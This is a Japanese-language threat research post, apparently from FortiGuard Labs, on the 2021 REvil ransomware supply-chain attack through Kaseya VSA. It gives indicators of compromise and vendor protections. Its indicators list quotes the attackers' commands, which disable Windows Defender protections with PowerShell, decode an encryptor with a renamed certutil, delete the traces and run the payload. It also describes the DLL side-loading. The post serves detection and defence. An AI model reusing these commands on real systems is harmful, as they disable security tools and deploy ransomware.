脅威リサーチ

Kaseyaプラットフォームを狙った新しいサプライチェーンランサムウェア攻撃

投稿者 Jonathan Nguyen-Duy | 2021年7月7日

FortiGuard Labs Breaking Update

新しいグローバルサプライチェーンランサムウェアの攻撃は、現在、Kaseya VSAプラットフォームのユーザーをターゲットにしています。このソフトウェアは、サービスデスクのチケッティングからパフォーマンスモニタリング、レポーティングまで、ITオペレーションのリモート管理を提供するものです。中央管理コンソールとして、Kaseya VSAプラットフォームは、多数のマネージドサービスプロバイダによって使用されており、リモートで監視し、マルチユーザ環境で同時に複数のマシンにソフトウェアやアップデートなどを展開しています。

非公式の報告では、このサプライチェーン攻撃の背後には、REvilランサムウェアの脅威アクターがいるとされています。REvilは、最近では5月にColonial PipelineとJBS foodsを攻撃したDarkSideアクターに起因するとされています。同じく非公式の報告によると、脅威アクターによって、Kaseya VSAエージェントのアップデートまたはホットフィックスとして、悪意のあるアップデートがKaseya VSAインターフェースに展開されたとしています。この偽のアップデートはランサムウェアのファイルであり、現在、Kaseya VSAを使用しているMSPプロバイダとその顧客のマシンを含む、何千ものシステムにダウンロードされています。小規模な組織では5万ドル、大規模な企業では最大500万ドルの身代金を要求されたという報告があります。

Kaseyaは、すべてのお客様に、オンプレミスのすべてのVSAサーバを直ちにオフラインにするように要請しています。この攻撃で影響を受けたのはオンプレミスのシステムだけです。クラウドベースのSaaSサービスは影響を受けていません。Kaseyaのアドバイザリは以下の通りです。

"ALL ON-PREMISES VSA SERVERS SHOULD CONTINUE TO REMAIN OFFLINE UNTIL FURTHER INSTRUCTIONS FROM KASEYA ABOUT WHEN IT IS SAFE TO RESTORE OPERATIONS. A PATCH WILL BE REQUIRED TO BE INSTALLED PRIOR TO RESTARTING THE VSA."(「すべてのオンプレミスVSAサーバは、Kaseyaからの指示があるまで、操作を再開しても安全になるまで、オフラインにしておくべきです。VSAを再起動する前に、パッチをインストールする必要があります。」)

この攻撃の報告は、MDR (Managed Detection and Response)プロバイダーであるHuntress Labsが最初にこの攻撃を発見し、その結果をRedditに投稿したことで表面化しました。今回のサプライチェーンランサムウェアによる攻撃は、米国の独立記念日に合わせて行われたため、世界中のあらゆる業種、特にマネージドサービスプロバイダーの大小を問わず、何百もの組織に影響を与えています。

注目すべき点

注意すべき脅威の兆候には次のようなものがあります。

  • 初期の通知では「KElevated######」 (SQL User) アカウントがこのアクションを実行したとされています。
  • ランサムウェアが展開される直前にVSAの管理者アカウントが無効化されます。
  • ランサムウェアのエンクリプタは、c:\kworking\agent.exeにドロップされます。
  • VSAの手順は「Kaseya VSA Agent Hot-fix」と名付けられています。
  • 少なくとも 2 つのタスクが以下を実行します。
    • C:\WINDOWS\system32\cmd.exe /c ping 127.0.0.1 -n 4979 > nul
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    • copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe
    • echo %RANDOM% >> C:\Windows\cert.exe
    • C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe
    • del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

また、エンクリプタ(agent.exe)は、以下の情報を含む有効なデジタル署名で署名されています。

  • Name: PB03 TRANSPORT LTD.
  • Email: Brouillettebusiness@outlook.com
  • CN = Sectigo RSA Code Signing, CAO = Sectigo Limited, L = Salford, S = Greater Manchester, C = GB
  • Serial #: 119acead668bad57a48b4f42f294f8f0
  • Issuer: https://sectigo.com/

agent.exeが実行されると、以下のファイルがハードコードされたパス C:\Windowsにドロップされます。

  • MsMpEng.exe - Windows Defenderの正規の実行ファイル
  • mpsvc.dll - 正規のDefender .EXEによってサイドロードされるエンクリプタのペイロード

推奨事項

フォーティネットは、Kaseya VSAプラットフォームを使用している組織に対し、Kaseyaの公式勧告にある現在のガイダンスを実施することを強く推奨します。"IMMEDIATELY shutdown your VSA server until you receive further notice from [Kaseya].”(「[Kaseya] から更なる通知を受け取るまで、直ちにVSAサーバをシャットダウンしてください。」)

フォーティネットのソリューション

Kaseya VSAサプライチェーン攻撃は、脅威アクターがさまざまなネットワークに侵入した方法ですが、これらの攻撃で使用されたランサムウェアは、FortiGuard Labsによって、次のような既知の公開サンプルに対するAVカバレッジを通じてブロックされています。

W32/Sodinokibi.EAD4!tr.ransom
W32/Sodinokibi.8859!tr.ransom
W32/Sodinokibi.5421!tr.ransom

FortiGuard Labsでは、以下のIPSでカバーしています。

Kaseya.VSA.Remote.Code.Execution

すべての既知のネットワークIOCは、Webフィルタリングクライアントによってブロックされています。

FortiGuard アンチウイルスサービスは、FortiGateFortiMailFortiClient、およびFortiEDRでサポートされています。Fortinet AVエンジンも、これらのソリューションの一部です。その結果、最新の保護機能を備えた製品をお持ちのお客様は保護されます。

FortiEDRの保護については、公開されているすべてのIOCは当社のクラウド基盤にもインテリジェンスとして追加されており、お客様のシステムで実行されるとブロックされます。

FortiGuard Responderチームは、Kaseyaに関するナレッジベースの分析を「FortiEDRがKaseyaサプライチェーンランサムウェア攻撃をどのように検知するか」(英語)として公開しています。

FortiSandboxでは、既知のランサムウェアのサンプルはすべて、振る舞いベースの保護機能によって検出されます。

Appendix

Kaseyaにより次のアドバイザリが掲載されています。  Information Regarding Potential Attack on Kaseya VSA

FortiGuard Threat Signalレポートには、このランサムウェア攻撃に関する最新情報と、FortiGuard Labsのプロテクションに関する最新情報が記載されています。「複数の組織に影響を及ぼすKaseya VSAへのグローバルランサムウェアおよびサプライチェーン攻撃」(英語)